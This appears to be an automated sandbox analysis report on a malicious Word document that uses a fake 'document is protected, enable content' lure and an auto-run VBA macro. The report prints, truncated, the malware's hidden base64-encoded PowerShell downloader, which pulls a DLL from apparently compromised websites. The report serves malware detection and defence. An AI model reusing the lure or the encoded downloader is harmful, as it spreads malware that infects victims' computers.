Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Full-Day-of-Eating-Keto-Bakes-Biscuits-Keto-
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jp
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.j
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/My-Southern-Keto-Kitchen-Cookbook-HOW-I-GOT-HERE-
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Ma
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogen
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/wp-json/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://ketoresetme.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://layerslider.kreaturamedia.com
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://nesaporn.mobi/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://onlyindianporn.me/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://phawayagency.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in binary or memory: https://phawayagency.com/wp-admin/mXo4b/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://phawayagency.comp
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://rajwap.me/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://rajwap.pro/
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://rycomputer.com
Source: powershell.exe, 00000005.00000002.2222999381.0000000003882000.00000004.00000001.sdmp String found in binary or memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000005.00000002.2223573753.0000000003C23000.00000004.00000001.sdmp String found in binary or memory: https://rycomputer.comp
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://schema.org
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://schema.org/WPHeader
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://schema.org/WebPage
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://stage.thebestfikrah.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://stage.thebestfikrah.com/#website
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://stage.thebestfikrah.com/?s=
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/about-us/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/analysis/articles-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/analysis/video-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/%E2%80%98Ilm-%E2%80%98Amal-Akhlak/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/Central-Message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/Islam-Today/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/Tarbiyyah-Da%E2%80%99wah-Jihad/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/category/Treasure-Seerah/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/comments/feed/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/feed/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/foreword-founder/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/issues/articles-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/our-team/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/privacy-policy/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/solution/articles-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/solution/video-the-central-message/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/terms-and-conditions/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2019/04/thebestfikrah_ico_square_100x100-01-100x100.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2019/04/thebestfikrah_ico_square_100x100-01.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1024x146.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-1536x219.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-2048x292.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-300x43.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2-770x110.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/Untitled-2.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-content/uploads/2020/11/cropped-logo-tbf-1-1.png
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-json/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/wp-json/wp-statistics/v2/hit?_=1610016483&_wpnonce=abbff8401c&wp_statistic
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://thebestfikrah.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://tubepatrol.porn/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/thebestfikrah
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/comments/feed/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/company/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/company/contact/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/feed/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/air-cargo/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/cost-calculators/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/courier/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/ocean-cargo/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/services/trucking/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/track-and-trace/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-admin/admin-ajax.php
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-color.png
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-white1.png
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-content/uploads/2015/12/Transportation-16x16-1.png
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/wp-json/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://wheelcomoving.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://wp-statistics.com/
Source: powershell.exe, 00000005.00000002.2223421947.0000000003B71000.00000004.00000001.sdmp String found in binary or memory: https://www.boldgrid.com/w3-total-cache/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://www.exactmetrics.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/thebestfikrah/?hl=en
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://www.youtube.com/channel/UCxY0oXl0BiKqF7iS16gHFhg
Source: powershell.exe, 00000005.00000002.2223475841.0000000003BAE000.00000004.00000001.sdmp String found in binary or memory: https://xxxthtube.com/
Source: powershell.exe, 00000005.00000002.2223624396.0000000003C45000.00000004.00000001.sdmp String found in binary or memory: https://yoast.com/wordpress/plugins/seo/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: I N@m 13 ;a 10096 G)
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Very long command line found
Source: unknown Process created: Commandline size = 5389
Source: unknown Process created: Commandline size = 5293
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5293 Jump to behavior
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Informacion_29.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Ouz_y28f7ehnqn, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Informacion_29.doc OLE indicator, VBA macros: true
Yara signature match
Source: 00000005.00000002.2217570571.0000000001BA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2217397039.0000000000106000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engine Classification label: mal96.troj.evad.winDOC@6/6@8/7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$formacion_29.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC64B.tmp Jump to behavior
Source: Informacion_29.doc OLE indicator, Word Document stream: true
Source: Informacion_29.doc OLE document summary: title field not present or empty
Source: Informacion_29.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............-........................... .4.......4...............'.....X.'.............#...............................h.......5kU.......'..... Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............-...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........'.....L.................'..... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..........................................}...............}.......x.....`Iz........v.....................K........^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.....`......0.l............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... A...............A.............}..v....`a......0.l...............^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................X..j......................A.............}..v.... n......0.l............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................X..j....h.^...............A.............}..v.....n......0.l...............^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............(..j......................A.............}..v....`.......0.l............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............(..j..... A...............A.............}..v............0.l.............8.^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....(................A.............}..v............0.l.............h.^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....+..................j.....(................A.............}..v....(.......0.l.............h.^............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Informacion_29.doc Virustotal: Detection: 62%
Source: Informacion_29.doc ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsA